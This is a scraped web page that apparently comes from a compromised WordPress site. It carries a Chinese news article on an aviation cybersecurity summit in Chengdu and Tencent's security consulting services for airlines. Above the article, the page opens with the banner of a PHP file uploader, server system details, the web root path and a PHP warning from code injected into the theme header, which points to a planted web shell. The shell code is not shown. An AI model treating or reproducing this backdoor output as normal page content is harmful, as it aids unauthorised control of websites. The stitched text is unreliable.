PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

近年来,云计算、大数据、人工智能等新技术不断进步,并与民航技术结合实现融合发展。国际民航的信息化、协同化、智能化已成趋势。同时,民航系统信息安全建设的重要性也日益凸显。

5与8日至9日,第二届民航网络安全与信息化发展趋势高峰会在成都召开。航空公司、机场集团、空管、各大机场和航空公司的相关职能部门、所属企业、高等院校、科研机构以及信息技术提供商等相关企事业单位代表和业内专家学者等汇聚一堂,共同探讨民航网络安全信息化建设,完善网络安全和信息化管理机制,提高重要网络和信息系统的安全保障水平。 

腾讯安全云鼎实验室陈颢明受邀出席峰会,分享了对民航业信息安全现状的思考,综合分析了航空公司面临的安全问题和挑战。对此,腾讯云安全专家服务提供覆盖“咨询-开发-建设-运维”的一站式信息安全专家服务,为民航业高品质发展和安全运行保驾护航。 

1557454273465380.png

民航信息安全四大核心痛点

民航业信息系统被列为国家关键基础设施和重要信息系统,各航空公司、机场也反应迅速,加大对信息安全建设的投入。从IAM(身份识别与访问管理)、通讯和网络安全、安全架构和系统等多个方面提升IT安全技术能力,同时,加强员工的安全意识培训,树立正确的网络安全观。 

尽管如此,航空公司仍面临四大信息安全的核心痛点:

旅客信息安全:旅客通过网络或机票代理商购买机票后,机票订单、旅客信息等容易遭到泄露。而一些要客的信息泄露更是会给航空公司带来名誉和经济的双重损失。 

电商业务安全:不法分子利用爬虫、DDoS等攻击手段肆意恶意注册、恶意占座、恶意改价,扰乱航空公司的正常订票秩序,严重影响旅客的购票、乘机体验,同时信息的爬取也让航空公司蒙受巨额损失。 

运控系统安全:飞机起降及飞行过程中,各项指令和操作都需通过运控系统进行统一调配。飞行的数据安全、系统安全和权限管控对旅客的生命财产安全至关重要,也是民航业得以不断发展的核心要素。 

合规审计风险:国内国际航线的不断繁荣,对各航空公司的安全合规提出了更高的要求。不仅需要满足国家网络安全法和等级保护标准,还需要遵从如欧盟GDPR等合规需要。 

一站式“咨询-开发-建设-运维”信息安全专家服务

针对民航业中存在的四大痛点,腾讯安全的专家服务融聚七大安全联合实验室的安全能力、沉淀十余年的人工智能与大数据能力和领先的威胁情报资源,为航空公司提供一站式的“咨询-开发-建设-运维”信息安全服务。 

在前期IT架构搭建和设计阶段,腾讯安全云鼎实验室为航空公司提供高端管理咨询,包括安全体系规划咨询、信息安全合规咨询服务。同时腾讯安全团队拥有丰富的行业信息安全解决方案,覆盖数据安全、应用安全、业务安全、移动安全,为企业提供专业的IT架构设计。 

而在实施与运维阶段,腾讯安全云鼎实验室不仅能够为航空公司提供威胁情报和漏洞预警等服务,还与航空公司形成合力,共同开展红蓝对抗、渗透测试等安全演练活动,对民航业企业提供安全重保服务。 

陈颢明表示,腾讯希望能够输出自身的安全能力,扮演好“数字化助手”的角色,与各航空公司通力合作,寻找新的合作点,将积累多年的行业经验运用到民航业的各个运营环节和服务环节,保障机场和航空公司信息、资产安全的同时,也切实保障每一位旅客的出行和信息安全。

来源:科技媒体DoNews

作者 一潼

发表回复